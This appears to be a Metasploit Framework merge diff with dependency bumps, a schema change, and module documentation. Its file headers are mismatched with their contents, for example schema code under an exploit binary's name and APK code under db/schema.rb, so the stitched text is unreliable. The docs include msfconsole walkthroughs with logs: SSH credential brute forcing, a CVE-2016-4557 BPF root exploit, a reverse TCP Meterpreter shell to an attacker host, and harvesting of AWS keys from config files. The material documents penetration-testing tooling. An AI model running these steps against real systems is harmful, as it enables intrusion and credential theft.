Bring rapid7#7540 up to date

Author: wchen-r7

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.12.41)
+    metasploit-framework (4.12.42)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -14,7 +14,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.1.26)
+      metasploit-payloads (= 1.1.28)
       metasploit_data_models
       metasploit_payloads-mettle (= 0.0.8)
       msgpack
@@ -89,7 +89,8 @@ GEM
       minitest (~> 5.1)
       thread_safe (~> 0.3, >= 0.3.4)
       tzinfo (~> 1.1)
-    addressable (2.4.0)
+    addressable (2.5.0)
+      public_suffix (~> 2.0, >= 2.0.2)
     arel (6.0.3)
     arel-helpers (2.3.0)
       activerecord (>= 3.1.0, < 6)
@@ -156,7 +157,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-credential (2.0.4)
+    metasploit-credential (2.0.5)
       metasploit-concern
       metasploit-model
       metasploit_data_models
@@ -168,8 +169,8 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.1.26)
-    metasploit_data_models (2.0.5)
+    metasploit-payloads (1.1.28)
+    metasploit_data_models (2.0.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
       arel-helpers
@@ -195,8 +196,8 @@ GEM
     network_interface (0.0.1)
     nokogiri (1.6.8.1)
       mini_portile2 (~> 2.1.0)
-    octokit (4.3.0)
-      sawyer (~> 0.7.0, >= 0.5.3)
+    octokit (4.6.0)
+      sawyer (~> 0.8.0, >= 0.5.3)
     openssl-ccm (1.2.1)
     openvas-omp (0.0.4)
     packetfu (1.1.11)
@@ -214,7 +215,8 @@ GEM
       coderay (~> 1.1.0)
       method_source (~> 0.8.1)
       slop (~> 3.4)
-    rack (1.6.4)
+    public_suffix (2.0.4)
+    rack (1.6.5)
     rack-test (0.6.3)
       rack (>= 1.0)
     rails-deprecated_sanitizer (1.0.3)
@@ -232,10 +234,10 @@ GEM
       thor (>= 0.18.1, < 2.0)
     rake (11.3.0)
     rb-readline-r7 (0.5.2.0)
-    recog (2.0.22)
+    recog (2.0.24)
       nokogiri
     redcarpet (3.3.4)
-    rex-arch (0.1.1)
+    rex-arch (0.1.2)
       rex-text
     rex-bin_tools (0.1.1)
       metasm
@@ -248,7 +250,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.1)
+    rex-exploitation (0.1.2)
       jsobfu
       metasm
       rex-arch
@@ -301,8 +303,8 @@ GEM
     rspec-support (3.5.0)
     rubyntlm (0.6.1)
     rubyzip (1.2.0)
-    sawyer (0.7.0)
-      addressable (>= 2.3.5, < 2.5)
+    sawyer (0.8.0)
+      addressable (>= 2.3.5, < 2.6)
       faraday (~> 0.8, < 0.10)
     shoulda-matchers (3.1.1)
       activesupport (>= 4.0.0)
@@ -319,7 +321,7 @@ GEM
     timecop (0.8.1)
     tzinfo (1.2.2)
       thread_safe (~> 0.1)
-    tzinfo-data (1.2016.8)
+    tzinfo-data (1.2016.9)
       tzinfo (>= 1.0.0)
     windows_error (0.0.2)
     xpath (2.0.0)

data/exploits/CVE-2016-4557/doubleput

@@ -11,7 +11,7 @@
 #
 # It's strongly recommended that you check this file into your version control system.
 
-ActiveRecord::Schema.define(version: 20161004165612) do
+ActiveRecord::Schema.define(version: 20161107203710) do
 
   # These are extensions that must be enabled in order to support this database
   enable_extension "plpgsql"
@@ -320,7 +320,8 @@
     t.string   "jtr_format"
   end
 
-  add_index "metasploit_credential_privates", ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, using: :btree
+  add_index "metasploit_credential_privates", ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, where: "(NOT ((type)::text = 'Metasploit::Credential::SSHKey'::text))", using: :btree
+  add_index "metasploit_credential_privates", ["type"], name: "index_metasploit_credential_privates_on_type_and_data_sshkey", unique: true, where: "((type)::text = 'Metasploit::Credential::SSHKey'::text)", using: :btree
 
   create_table "metasploit_credential_publics", force: :cascade do |t|
     t.string   "username",   null: false

data/exploits/CVE-2016-4557/hello

@@ -0,0 +1,167 @@
+## Notes
+
+This module (and the original exploit) are written in several parts: hello, doubleput, and suidhelper.
+
+Mettle at times on this exploit will give back an invalid session number error.  In these cases payload/linux/x64/shell/bind_tcp seemed to always work.
+
+As of PR submission, the original shell becomes unresposive when the root shell occurs.  Metasm fails to compile due to fuse.h being required.
+
+As of PR submission, killing of the process hello and doubleput has to occur manually.  /tmp/fuse_mount also needs to be unmounted and deleted.
+
+## Creating A Testing Environment
+
+There are a few requirements for this module to work:
+
+  1. CONFIG_BPF_SYSCALL=y must be set in the kernel (default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
+  2. kernel.unprivileged_bpf_disabled can't be set to 1 (default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
+  3. fuse needs to be installed (non-default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
+  
+  Using Ubuntu 16.04, simply `sudo apt-get install fuse` and you're all set!
+
+This module has been tested against:
+
+  1. Ubuntu 16.04 linux-image-4.4.0-38-generic (pre-compile & live compile)
+  2. Ubuntu 16.04 (default kernel) linux-image-4.4.0-21-generic (pre-compile & live compile)
+
+This module was not tested against, but may work against:
+
+  1. Fedora 24 < [kernel-4.5.4-300.fc24](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
+  2. Fedora 23 < [kernel-4.5.5-201.fc23](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
+  3. Fedora 22 < [kernel-4.4.10-200.fc22](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
+  4. Debian >= 4.4~rc4-1~exp1, < Fixed in version [4.5.3-1](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=823603)
+  5. Ubuntu 14.04.1 <= [4.4.0-22.39](https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1578705/comments/3)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Exploit a box via whatever method
+  4. Do: `use exploit/linux/local/bpf_priv_esc`
+  5. Do: `set session #`
+  6. Do: `set verbose true`
+  7. Do: `exploit`
+
+## Options
+
+  **MAXWAIT**
+
+  The first stage of this priv esc can take ~35seconds to execute.  This is the timer on how long we should wait till we give up on the first stage finishing.  Defaults to 120 (seconds)
+
+  **WritableDir**
+
+  A folder we can write files to.  Defaults to /tmp
+
+  **COMPILE**
+  
+  If we should live compile on the system, or drop pre-created binaries.  Auto will determine if gcc/libs are installed to compile live on the system.  Defaults to Auto
+
+## Scenarios
+
+### Ubuntu 16.04 (with Linux 4.4.0-38-generic)
+
+#### Initial Access
+
+    msf > use auxiliary/scanner/ssh/ssh_login
+    msf auxiliary(ssh_login) > set rhosts 192.168.199.130
+    rhosts => 192.168.199.130
+    msf auxiliary(ssh_login) > set username ubuntu
+    username => ubuntu
+    msf auxiliary(ssh_login) > set password ubuntu
+    password => ubuntu
+    msf auxiliary(ssh_login) > exploit
+    
+    [*] SSH - Starting bruteforce
+    [+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) Linux ubuntu 4.4.0-38-generic #57-Ubuntu SMP Tue Sep 6 15:42:33 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
+    [!] No active DB -- Credential data will not be saved!
+    [*] Command shell session 1 opened (192.168.199.131:39175 -> 192.168.199.130:22) at 2016-09-27 12:25:31 -0400
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+
+#### Escalate
+
+In this scenario, gcc and libfuse-dev are both installed so we can live compile on the system.
+
+    msf auxiliary(ssh_login) > use exploit/linux/local/bpf_priv_esc
+    msf exploit(bpf_priv_esc) > set verbose true
+    verbose => true
+    msf exploit(bpf_priv_esc) > set session 1
+    session => 1
+    msf exploit(bpf_priv_esc) > set lhost 192.168.199.131
+    lhost => 192.168.199.131
+    msf exploit(bpf_priv_esc) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.199.131:4444 
+    [+] CONFIG_BPF_SYSCAL is set to yes
+    [+] kernel.unprivileged_bpf_disabled is NOT set to 1
+    [+] fuse is installed
+    [+] libfuse-dev is installed
+    [+] gcc is installed
+    [*] Live compiling exploit on system
+    [*] Writing files to target
+    [*] Writing hello to /tmp/hello.c
+    [*] Max line length is 65537
+    [*] Writing 2760 bytes in 1 chunks of 9767 bytes (octal-encoded), using printf
+    [*] Writing doubleput to /tmp/doubleput.c
+    [*] Max line length is 65537
+    [*] Writing 5182 bytes in 1 chunks of 18218 bytes (octal-encoded), using printf
+    [*] Writing suidhelper to /tmp/suidhelper.c
+    [*] Max line length is 65537
+    [*] Writing 352 bytes in 1 chunks of 1219 bytes (octal-encoded), using printf
+    [*] Compiling all modules on target
+    [*] Writing payload to /tmp/AyDJSaMM
+    [*] Max line length is 65537
+    [*] Writing 188 bytes in 1 chunks of 506 bytes (octal-encoded), using printf
+    [*] Starting execution of priv esc.  This may take about 120 seconds
+    [+] got root, starting payload
+    [*] Transmitting intermediate stager...(126 bytes)
+    [*] Sending stage (2412016 bytes) to 192.168.199.130
+    [*] Meterpreter session 2 opened (192.168.199.131:4444 -> 192.168.199.130:43734) at 2016-09-27 12:26:06 -0400
+    [*] Cleaning up...
+    
+    meterpreter > getuid
+    Server username: uid=0, gid=0, euid=0, egid=0
+    meterpreter > sysinfo
+    Computer     : 192.168.199.130
+    OS           : Ubuntu 16.04 (Linux 4.4.0-38-generic)
+    Architecture : x86_64
+    Meterpreter  : x64/linux
+    
+#### Escalate w/ pre-compiled binaries
+
+It is possible to force pre-compiled binaries, however in this case we look at a system that doesn't have libfuse-dev (ubuntu) installed
+
+    msf auxiliary(ssh_login) > use exploit/linux/local/bpf_priv_esc
+    msf exploit(bpf_priv_esc) > set verbose true
+    verbose => true
+    msf exploit(bpf_priv_esc) > set session 1
+    session => 1
+    msf exploit(bpf_priv_esc) > set lhost 192.168.199.131
+    lhost => 192.168.199.131
+    msf exploit(bpf_priv_esc) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.199.131:4444 
+    [+] CONFIG_BPF_SYSCAL is set to yes
+    [+] kernel.unprivileged_bpf_disabled is NOT set to 1
+    [+] fuse is installed
+    [-] libfuse-dev is not installed.  Compiling will fail.
+    [*] Dropping pre-compiled exploit on system
+    [*] Writing pre-compiled binarys to target
+    [*] Max line length is 65537
+    [*] Writing 9576 bytes in 1 chunks of 24954 bytes (octal-encoded), using printf
+    [*] Max line length is 65537
+    [*] Writing 13920 bytes in 1 chunks of 36828 bytes (octal-encoded), using printf
+    [*] Max line length is 65537
+    [*] Writing 8840 bytes in 1 chunks of 21824 bytes (octal-encoded), using printf
+    [*] Writing payload to /tmp/AyDJSaMM
+    [*] Max line length is 65537
+    [*] Writing 188 bytes in 1 chunks of 506 bytes (octal-encoded), using printf
+    [*] Starting execution of priv esc.  This may take about 120 seconds
+    [+] got root, starting payload
+    [-] This exploit may require process killing of 'hello', and 'doubleput' on the target
+    [-] This exploit may requires manual umounting of /tmp/fuse_mount via 'fusermount -z -u /tmp/fuse_mount' on the target
+    [-] This exploit may requires manual deletion of /tmp/fuse_mount via 'rm -rf /tmp/fuse_mount' on the target
+    [*] Transmitting intermediate stager...(126 bytes)
+    [*] Sending stage (2412016 bytes) to 192.168.199.130
+    [*] Meterpreter session 2 opened (192.168.199.131:4444 -> 192.168.199.130:55522) at 2016-09-28 08:08:04 -0400
+    
+    meterpreter > getuid
+    Server username: uid=0, gid=0, euid=0, egid=0

data/exploits/CVE-2016-4557/suidhelper

@@ -0,0 +1,56 @@
+## Vulnerable Application
+
+  Any system with a `shell` or `meterpreter` session.
+
+## Verification Steps
+
+  1. Get a `shell` or `meterpreter` session on some host.
+  2. Do: ```use post/multi/gather/aws_keys```
+  3. Do: ```set SESSION [SESSION_ID]```, replacing ```[SESSION_ID]``` with the session number you wish to run this one.
+  4. Do: ```run```
+  5. If the system has readable configuration files containing AWS key material, they will be printed out.
+
+## Options
+
+  None.
+
+## Scenarios
+
+  ```
+msf post(aws_keys) > run
+
+[*] Enumerating possible user AWS config files
+[*] Looking for AWS config/credentials files in /bin
+[*] Looking for AWS config/credentials files in /dev
+[*] Looking for AWS config/credentials files in /home/syslog
+[*] Looking for AWS config/credentials files in /home/test
+[*] Looking for AWS config/credentials files in /home/test  ubuntu
+[*] Looking for AWS config/credentials files in /home/ubuntu
+[*] Looking for AWS config/credentials files in /nonexistent
+[*] Looking for AWS config/credentials files in /root
+[*] Looking for AWS config/credentials files in /usr/games
+[*] Looking for AWS config/credentials files in /usr/sbin
+[*] Looking for AWS config/credentials files in /var/backups
+[*] Looking for AWS config/credentials files in /var/cache/man
+[*] Looking for AWS config/credentials files in /var/cache/pollinate
+[*] Looking for AWS config/credentials files in /var/lib/gnats
+[*] Looking for AWS config/credentials files in /var/lib/landscape
+[*] Looking for AWS config/credentials files in /var/lib/libuuid
+[*] Looking for AWS config/credentials files in /var/list
+[*] Looking for AWS config/credentials files in /var/mail
+[*] Looking for AWS config/credentials files in /var/run/dbus
+[*] Looking for AWS config/credentials files in /var/run/ircd
+[*] Looking for AWS config/credentials files in /var/run/sshd
+[*] Looking for AWS config/credentials files in /var/spool/lpd
+[*] Looking for AWS config/credentials files in /var/spool/news
+[*] Looking for AWS config/credentials files in /var/spool/uucp
+[*] Looking for AWS config/credentials files in /var/www
+AWS Key Data
+============
+
+Source                         AWS_ACCESS_KEY_ID  AWS_SECRET_ACCESS_KEY  Profile
+------                         -----------------  ---------------------  -------
+/home/test/.aws/credentials    BAR                PRIVATE_TEST           test
+/home/ubuntu/.aws/credentials  ABC456             PRIVATE_TEST           test
+/root/.s3cfg                   root_key           root_secret            default
+```

data/exploits/office_ole_multiple_dll_hijack.ppsx

@@ -30,7 +30,7 @@ def self.get_hash
         end
       end
 
-      VERSION = "4.12.41"
+      VERSION = "4.12.42"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

db/schema.rb

@@ -98,7 +98,7 @@ def fix_manifest(tempdir)
 
   def parse_orig_cert_data(orig_apkfile)
     orig_cert_data = Array[]
-    keytool_output = run_cmd("keytool -printcert -jarfile #{orig_apkfile}")
+    keytool_output = run_cmd("keytool -J-Duser.language=en -printcert -jarfile #{orig_apkfile}")
     owner_line = keytool_output.match(/^Owner:.+/)[0]
     orig_cert_dname = owner_line.gsub(/^.*:/, '').strip
     orig_cert_data.push("#{orig_cert_dname}")